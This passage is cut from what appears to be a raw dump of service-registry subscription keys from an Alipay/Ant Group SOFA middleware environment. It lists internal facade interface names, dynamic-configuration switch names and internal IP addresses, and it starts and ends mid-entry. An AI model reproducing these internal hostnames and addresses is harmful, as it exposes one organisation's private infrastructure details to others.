D#@#SOFA","com.alipay.dayutrprod.common.facade.inspect.HaPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.stock.VcpVoucherStockManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.30.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.search.SearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.l2cache.L2CacheClientSwitch.degradeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsupport.component.cache.masterdata.MasterDataInfo:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.AppPlatformConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.test.facade.TestFindecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.AssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.NomoCrowdManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.giftprod.amy.service.facade.GiftGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.44.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iexclienttrdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:socialcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.pk.facade.api.PkRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.common.service.facade.execute.HeartbeatCheck:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.policybench.common.service.facade.api.DictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.24.10.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:arpdataprovider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.DiscountCdpQueryRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_planSendApproverMsgProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.RelationChangeLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.rayag.facade.service.cluster.ClusterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.account.FundAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cfpcenter.common.service.facade.api.ecm.EcmCrossSubjectManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:kbbusinessprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.OraRerankFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.monitorMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.facade.ins.InsProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.LogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:pucprod_result_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.SynchronizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:bizTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropgn.common.service.facade.RopgnRisktaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.api.SingleLocalPayoutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ZcbProductxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.AsrProcessResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.order.VcpOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.integration.cryptoprod.CryptprodClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.PromoRuleCheckRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.maxPullIntervalWhenConsumeFail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.decide.api.DialogDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.TaskProcessCallBackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.fixedInvestmentSchedulerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.facade.api.AccenterDailyCutFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.GenericRpcConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.peerpay.PeerPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.org.EnterpriseStewardOrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntContractRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.integration.paramcenter.ParamCenterOperationClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.shared.gildata.service.GdMainShListNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.spi.LoanCreditFacade:1.0:fxwLoanCreditApplyNodeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.meshyserver.common.service.facade.spi.LeadsQueryFacade:1.0:meshysale-medical@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.253.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-originPriceAnnualSubProcessCollect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.integration.biscenter.OperatorShopPermissionQueryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.trade.service.CommoditiesProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mpromocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:authweb@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.service.facade.AdvanceFundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.notice.LifeNoticeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.api.divide.EquityDivideManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.finpwmXTradeDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:assettransFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.banner.BannerOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.MarketingDecisionFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.VerifyFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualityprod.service.riskctrl.api.ChangeRiskCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdprod.facade.api.OpsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.biz.rpc.tangram.calendar.patrol.PatrolCalendarLifeSquareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbcraftsman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.redpoint.api.RedPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.198.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rctrack.OrderTrackFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.cluster.service.CacheQueryReceiverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OfferMigrationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloudnet.facade.callback.UniformCallbackFacade:1.0:dsaas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:asttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zpublishuiweb_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.facade.ArticleRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.cognitive.ServiceCognitiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.BdGwOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.gplus.hook.HookUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.TelCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.ClaimServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshysale_businessProcessAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.pamir.operator.PamRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.TwoPhaseVoucherPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadatacenter.facade.api.FeatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.needCompare,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue13#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.orderlink.OrderLinkTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.asset.facade.AdvisorAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.SocpltStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskAppointmentService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CISetupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_CRM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.management.KatongCardSignStatusManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.QuotationPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdminOperateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.waika.WkChargeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.ConnectionApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.GroupChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finstore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloanrepay.common.service.facade.api.LoanRateManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.MetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.SpiManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.88.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbill.facade.service.PcreditBillTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.preauthuserpurchase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antgroup.zmxy.zmepcustprod.facade.api.certify.EpVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.singleSecParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.dragonxroute.DragonxRouteServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-progov-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.himalaya.common.service.facade.api.ServiceWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_BAAS_TEST_TASK4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.manager.facade.api.EinvInvoiceAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","tets:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryNewModeCompareResultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.supplier.AssetSupplierQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.drm.InstConfigDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.addp_tddl_ds_new.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscenter.service.knowledge.facade.KnowledgeSearchService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplatform.common.service.facade.api.ActivityDiagnosisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcsql.common.service.facade.api.EmcAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.123.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.FinancialCertifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.manage.DataNodeTypeVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmdecision.common.service.facade.StrategyOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:overseaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.4.212.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.newCacheSceneSetStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleShopCreateSignExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.ChkFundLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BKWIRELESSDATAPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:TMS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoscene.common.service.facade.api.feature.FeatureCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.SupervisionFilePathFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.landlordgame.facade.api.ActivityCleanDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:batchSendPrizeCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushLocalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:DATABASE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.assistant.MiniAppRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoDetailPageInfoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.finfodds.FinfoddsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.plugin.CurrentCommandService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.qc.AssetQcStandardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.open.AssetAddressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.AlipayRelationQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.intclcn.common.service.facade.LoanIntClcnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ldc.DefaultUidGenerator:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_FRDCPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwalm.core.service.fluidmng.rule.engine.RuleEngine:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdMarketingProdConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.ResourceGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.smidFileContentMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.proxy.GzProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmopenapi.service.facade.AopAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.AntProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.57.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.biz.rpc.appad.MobileAppAdServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.TempAkServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledataprod.service.facade.FriendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.MessageLogManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.opencore.common.security.drm.NotifyParamSwitchDrm.protocalParamList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantOperatorRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.PointsAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.AblityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdetail.service.provider.SdServiceAdapter:1.0:kbreservationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.clearingcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.manager.facade.api.EinvInvoiceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:ocrAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.userspeech.UserSpeechFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.inner.ConsumeRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.project.ProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.allowWfinFundGotone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_INSTTRADE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_task_generator.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gclearingc